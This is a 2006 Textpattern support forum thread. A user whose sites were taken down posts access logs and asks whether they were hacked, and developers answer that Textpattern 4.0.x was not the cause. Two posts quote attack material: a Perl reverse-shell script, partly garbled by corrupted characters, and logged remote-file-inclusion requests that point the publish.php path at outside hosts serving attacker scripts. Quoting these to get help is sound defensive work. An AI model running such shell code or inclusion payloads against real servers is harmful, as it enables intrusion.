Textpattern Hacked / Vulnerability!

makason · 2006-10-27 20:09:39

My hosting Company just took my server down because there was a remote attack on all my textpattern sites.
The attackers brought down their servers. Most textpattern installs are 4.03 and some are still 4.01.

They shut down the webserver and have me upgrade to the latest version 4.0.4. Does the new version prevent remote execution of publish.php?

Below is the log file and the hack file:

<code>
#!/usr/bin/perl
use Socket;
$cmd= “lynx”;
$system= ‘echo “`uname -a`”;ec˘°ºÄâÅ•ëÄàÏΩâ•∏ΩÕ†úÏ4(ê¿ÙëçµêÏ4(ë—Ö…ùï–ÙëIYl¡tÏ4(ë¡Ω…–ÙëIYl≈tÏ4(ë•Öëë»ı•πï—}Ö—Ω∏†ë—˙&vWBí«¬FñRÇ$W’&˜#¢B∆‚“ì∞–¢GFG#◊6ˆ6∂FG%ˆñ‚ÇG˜‘B¬FñFG“í«¬FñRÇ$W’&˜#¢B∆‚“ì˙√Bâõ›œYŸ]õ›ÿû[ò[YJ ›‹ N√Bú€ÿ⁄Ÿ]
”–“—Uó“SëU”–“◊‘’ëPSK õ› HYJ˙Error: $!\n”);
connect(SOCKET, $paddr) || die(“Error: $!\n”);
open(STDIN, “>&SOCKET“¯§Ï4)Ω¡ï∏°MQ=UP∞Äà¯ôM=
-Pà§Ï4)Ω¡ï∏°MQIH∞Äà¯ôM=
-Pà§Ï4)ÕÂÕ—ï¥†ëÕÂÕ—ï¥§Ï4)ç±ΩÕî°MQ%¯‚ì∞–¶6∆˜6RÖ5DDıUBì∞–¶6∆˜6RÖ5DDU%“ì∞
</code>

Log file
<code>
81.215.254.22 – - [27/Oct/2006:12:29:18 -0500] “POST /textpattern/publish.php?txpcfg[txpath]=http://hbags.com/c57.txt?cmd=id HTTP/1.
1” 200 24287 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
81.215.254.22 – - [27/Oct/2006:12:29:29 -0500] “POST /textpattern/publish.php?txpcfg[txpath]=http://hbags.com/c57.txt?cmd=id HTTP/1.
1” 200 24354 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
81.215.254.22 – - [27/Oct/2006:12:29:42 -0500] “POST /textpattern/publish.php?txpcfg[txpath]=http://hbags.com/c57.txt?cmd=id HTTP/1.
1” 200 23081 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
81.215.254.22 – - [27/Oct/2006:12:30:06 -0500] “POST /textpattern/publish.php?txpcfg[txpath]=http://hbags.com/c57.txt?cmd=id HTTP/1.
1” 200 23103 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
81.215.254.22 – - [27/Oct/2006:12:30:11 -0500] “POST /textpattern/publish.php?txpcfg[txpath]=http://hbags.com/c57.txt?cmd=id HTTP/1.
1” 200 24354 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
</code>

ruud · 2006-10-27 20:47:09

4.0.4 is not vulnerable to this attack.
What version of TXP were you using on your website?

makason · 2006-10-27 20:48:54

just found in one install that I didn’t uncomment this :
#php_value register_globals 0

Was this the loophole?

Thanks

ruud · 2006-10-27 20:55:35

Probably. Though that line isn’t part of the default .htaccess file that TXP supplies (as far as I know).
You should have register_globals disabled anyway. Not just for Textpattern.

If you want to disable outside access to publish.php and other files that should not be called directly, have a look at this thread

Last edited by ruud (2006-10-27 20:56:33)

zem · 2006-10-27 21:22:07

Textpattern 4.0.x is not vulnerable to this attack even with register globals turned on. All versions of Textpattern 4.0 prevent direct execution of publish.php.

The “attack code” you posted appears to be unrelated to the attempts you’re seeing in your Textpattern logs.

Most likely, something else on your server was hacked. Whatever happened, it wasn’t caused by those POST requests.

Last edited by zem (2006-10-27 21:41:15)

zem · 2006-10-27 21:44:12

Thread closed temporarily while we investigate. In the meantime, please see the FAQ.

zem · 2006-10-28 22:23:42

Update: no evidence sofar that Textpattern was hacked. Still waiting on a response from the hosting company.

zem · 2006-10-31 01:32:14

The hosting company now says Textpattern wasn’t hacked (at least, not the 4.0.3 copy – there may have been another install of g1.19, which does have a security problem).

It’s not clear exactly what happened, because the account had a number of scripts installed, several of which have had vulnerabilities in the past.

GPH · 2006-10-31 23:55:22

I was just about to ask this in a new thread, I’m running 4.0.4 and lately have been seeing this type of entry in my logs

article/4//textpattern/publish.php?txpcfg[txpath]=http://realhack.altervista.org/iniez.txt?

Is this anything to be worried about?

Thanks

GPH · 2006-11-01 00:03:03

Sorry I’ve just read the FAQ link.

On the diagnostic I do have this pre-flight msg…

The following PHP functions (which may be necessary to run Textpattern) are disabled on your server:: ini_alter,system,passthru,shell_exec,leak,listen,chgrp,apache_setenv,define_syslog_variables,openlog,syslog,ftp_exec

Are these safe to have disabled?

Last edited by GPH (2006-11-01 08:46:20)

ruud · 2006-11-01 00:15:03

Yes. I don’t think TXP uses any of those.

Textpattern CMS

Textpattern CMS support forum

#1 2006-10-27 20:09:39

Textpattern Hacked / Vulnerability!

#2 2006-10-27 20:47:09

Re: Textpattern Hacked / Vulnerability!

#3 2006-10-27 20:48:54

Re: Textpattern Hacked / Vulnerability!

#4 2006-10-27 20:55:35

Re: Textpattern Hacked / Vulnerability!

#5 2006-10-27 21:22:07

Re: Textpattern Hacked / Vulnerability!

#6 2006-10-27 21:44:12

Re: Textpattern Hacked / Vulnerability!

#7 2006-10-28 22:23:42

Re: Textpattern Hacked / Vulnerability!

#8 2006-10-31 01:32:14

Re: Textpattern Hacked / Vulnerability!

#9 2006-10-31 23:55:22

Re: Textpattern Hacked / Vulnerability!

#10 2006-11-01 00:03:03

Re: Textpattern Hacked / Vulnerability!

#11 2006-11-01 00:15:03

Re: Textpattern Hacked / Vulnerability!

Board footer